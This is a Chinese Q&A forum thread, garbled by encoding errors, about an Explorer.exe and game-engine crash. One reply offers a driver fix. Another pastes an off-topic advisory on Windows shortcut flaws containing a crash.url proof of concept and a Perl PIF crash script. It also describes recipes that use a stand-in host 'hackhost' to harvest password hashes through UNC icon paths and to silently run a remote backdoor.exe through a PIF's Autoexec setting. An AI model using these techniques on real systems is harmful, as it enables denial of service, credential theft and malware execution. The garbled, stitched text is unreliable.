登陸出現(xiàn)Explorer.exe出錯(cuò),只有重起計(jì)算機(jī),還是不能進(jìn),反復(fù)n次。偶爾過(guò)了這關(guān)(任務(wù)欄都被搞沒(méi)了偶爾進(jìn)如)出現(xiàn)如下錯(cuò)誤OS: Windows 2000 5.0 (Build: 2195)CPU: AuthenticAMD PentiumPro-class processor @ 1836 MHz with 511MB RAMVideo: NVIDIA GeForce FX 5200 (5303)General protection fault!History: FUnrealfileSummary<< <- LoadSummary <- ULinkerLoad::Load <- ULinkerLoad::ULinkerLoad <- UObject::GetPackageLinker <- UObject::StaticLoadObject <- (Engine.Texture est_19_265 NULL) <- UNetworkHandler::Tick <- Function Name=PledgeShowMembe <- UGameEngine::Tick <- UpdateWorld <- MainLoop請(qǐng)s i n a管理員回個(gè)說(shuō)明,謝謝,整個(gè)網(wǎng)吧n天玩不了啦

熱心網(wǎng)友

首先譴責(zé)linxue521107的回答,根本就是胡說(shuō)八道!下面給出正確的解決方法。 分析出錯(cuò)提示——CPU: AuthenticAMD PentiumPro-class processor @ 1836 MHz with 511MB RAMVideo: NVIDIA GeForce FX 5200 (5303)說(shuō)明硬件達(dá)到要求。(Engine.Texture est_19_265 NULL) <- UNetworkHandler::Tick <- Function Name=PledgeShowMembe <- UGameEngine::Tick <- UpdateWorld <- MainLoop說(shuō)明顯示模塊裝載紋理的時(shí)候出錯(cuò)解決辦法——重新安裝dx8.1與顯示卡驅(qū)動(dòng)程序

熱心網(wǎng)友

、 Windows快捷方式包括擴(kuò)展名為lnk、pif、url的文件。其中url文件為純文本格式lnk 和pif文件為二進(jìn)制文件。這三種快捷方式都可以自定義圖標(biāo)文件,當(dāng)把圖標(biāo)文件名設(shè)定為 Windows的默認(rèn)設(shè)備名時(shí),由于設(shè)備名稱解析漏洞,可導(dǎo)致Windows 95/98系統(tǒng)崩潰。由于 對(duì)圖標(biāo)的搜索是由Explorer自動(dòng)完成的,所以只要快捷方式在資源瀏覽器中出現(xiàn),就會(huì)導(dǎo) 致系統(tǒng)崩潰。如果快捷方式在桌面上,那么系統(tǒng)一啟動(dòng)就會(huì)崩潰。只有以DOS啟動(dòng)系統(tǒng),在 命令行下刪除。由于無(wú)法直接設(shè)置圖標(biāo)文件名為設(shè)備名,只有通過(guò)直接編輯的方式來(lái)創(chuàng)建。   測(cè)試:   ------把以下代碼存為“crash。url”------   [InternetShortcut]   URL=   IconIndex=1   IconFile=C:\con\con。dll   --------------END---------------------   對(duì)于lnk和pif文件可先更名,再通過(guò)16進(jìn)制編輯器更改相應(yīng)字段。   2、   對(duì)于Windows NT/2000系統(tǒng)不會(huì)由于設(shè)備名稱解析而崩潰。但當(dāng)我們創(chuàng)建一個(gè)完全由   ASCII字符填充組成的pif文件時(shí)會(huì)出現(xiàn)以下情況:   1)一個(gè)非法的pif文件(用ascii字符'x'填充)至少要369字節(jié),系統(tǒng)才認(rèn)為是一個(gè)   合法的pif文件,才會(huì)以pif的圖標(biāo)[pifmgr。dll,0]顯示,才會(huì)在屬性里有程序、   字體、內(nèi)存、屏幕”等內(nèi)容。而且僅僅當(dāng)一個(gè)非pif文件的大小是369字節(jié)時(shí)察看   屬性的“程序”頁(yè)時(shí),不會(huì)發(fā)生程序錯(cuò)誤,哪怕是370字節(jié)也不行。當(dāng)對(duì)一個(gè)大于   369字節(jié)的非法pif文件察看屬性的“程序”頁(yè)時(shí),Explorer會(huì)出錯(cuò),提示:   "0x77650b82"指令引用的"0x000000000"內(nèi)存。該內(nèi)存不能為"read"   但這種錯(cuò)誤并不會(huì)引起緩沖溢出的安全問(wèn)題。初步分析了一下,問(wèn)題出在pif文件   的16進(jìn)制地址:   0x00000181[0x87]0x00000182[0x01]和   0x00000231[0xC3]0x00000232[0x02]   即使是一個(gè)合法pif文件,只要改動(dòng)這四處的任意一處,也會(huì)引起程序錯(cuò)誤。而只   要把0x00000181和0x00000182的值改為[0xFF][0xFF],那么其它地址任意更改   都不會(huì)引起錯(cuò)誤。   2)當(dāng)一個(gè)大于30857的非法pif文件(用ascii字符'x'填充)出現(xiàn)在資源管理器中時(shí),   會(huì)使系統(tǒng)的CPU資源占用達(dá)100%,根本不能察看其屬性頁(yè)。也無(wú)法在資源管理器中   對(duì)其進(jìn)行任何操作,甚至不能在命令提示符中刪除。試圖刪除時(shí)會(huì)提示會(huì)提示:   “進(jìn)程無(wú)法訪問(wèn)文件,因?yàn)榱硪粋€(gè)程序正在使用此文件。”   但只要把0x00000181和0x00000182中任意一處改為[0xFF]這種情況就不會(huì)發(fā)生。   這是由于資源瀏覽器試圖顯示其實(shí)并不存在的圖標(biāo)引起的。如果快捷方式在桌面   上,那么系統(tǒng)一啟動(dòng)這種情況就會(huì)出現(xiàn)。只有使用任務(wù)管理器中止Explorer。exe   的進(jìn)程,再啟動(dòng)一個(gè)命令提示符,從命令行下刪除。   此問(wèn)題僅影響Windows NT/2000系統(tǒng),不影響Windows 95/98。   測(cè)試代碼:   ----------------------------------------   #!perl   #Windows NT/2000 pif_Crash_Exploit   #silly code by tombkeeper@   open (FH,"full。pif") or die "$!";   print (FH 'x'x3085;   close (FH);   system ("cmd /c start taskmgr。exe");   ---------------------------------------- 3、 由于快捷方式顯示的圖標(biāo)是由Explorer自動(dòng)從設(shè)定的路徑中獲取的,而Windows快捷 方式的圖標(biāo)文件設(shè)置支持UNC路徑,入侵者可以使用如下社交工程學(xué)詭計(jì)獲得用戶口令散 列值:在一臺(tái)主機(jī)hackhost啟動(dòng)一個(gè)sniffer程序,通過(guò)郵件或其他方式向主機(jī)target的 用戶發(fā)送一個(gè)圖標(biāo)設(shè)制為UNC路徑\\hackhost\c\foo。ico的快捷方式,只要此快捷方式出 現(xiàn)在資源管理器中,Explorer就會(huì)試圖用當(dāng)前用戶的帳號(hào)連接hackhost以獲取foo。ico, 這樣,用戶的口令散列值就會(huì)被sniffer記錄,可以通過(guò)一些工具破解。 4、 在Windows NT/2000系統(tǒng)的pif文件的“屬性”--“程序”--“高級(jí)”--“自定義 MS-DOS 初始化文件”中的“Autoexec 文件名”和“Config 文件名”默認(rèn)是: %SystemRoot%\SYSTEM32\AUTOEXEC。NT和%SystemRoot%\SYSTEM32\CONFIG。NT 這兩個(gè)文件名支持UNC路徑。利用這個(gè)弱點(diǎn),入侵者可以進(jìn)行如下社交工程學(xué)詭計(jì):在一 臺(tái)主機(jī)hackhost上建立共享文件夾evil,在文件夾evil中包含文件foo。nt和backdoor。exe。 foo。nt的內(nèi)容是:“。\backdoor。exe”再通過(guò)郵件或別的方法發(fā)送一個(gè)看起來(lái)完全無(wú)害的 game。pif,這個(gè)game。pif的“Autoexec 文件名”是“\\hackhost\evil\foo。nt”。用戶 打開(kāi)game。pif就會(huì)執(zhí)行backdoor。exe,而且是在后臺(tái)運(yùn)行。   使用UNC路徑時(shí)“Autoexec 文件名”和“Config 文件名”默認(rèn)的當(dāng)前目錄是C:\。   5、   win32PE程序的擴(kuò)展名改為pif后,任然可以正常運(yùn)行,可以蒙蔽一些用戶執(zhí)行惡意程   序。SirCam病毒就利用了這一點(diǎn)。   解決方案:   不要輕易把郵件的附件導(dǎo)出,尤其不要導(dǎo)出到桌面上,更不要輕易打開(kāi)郵件中的各種   快捷方式附件,至少不要以管理帳戶登錄來(lái)做這些事。一旦出現(xiàn)問(wèn)題,可以按文中提 到的方法解決。 。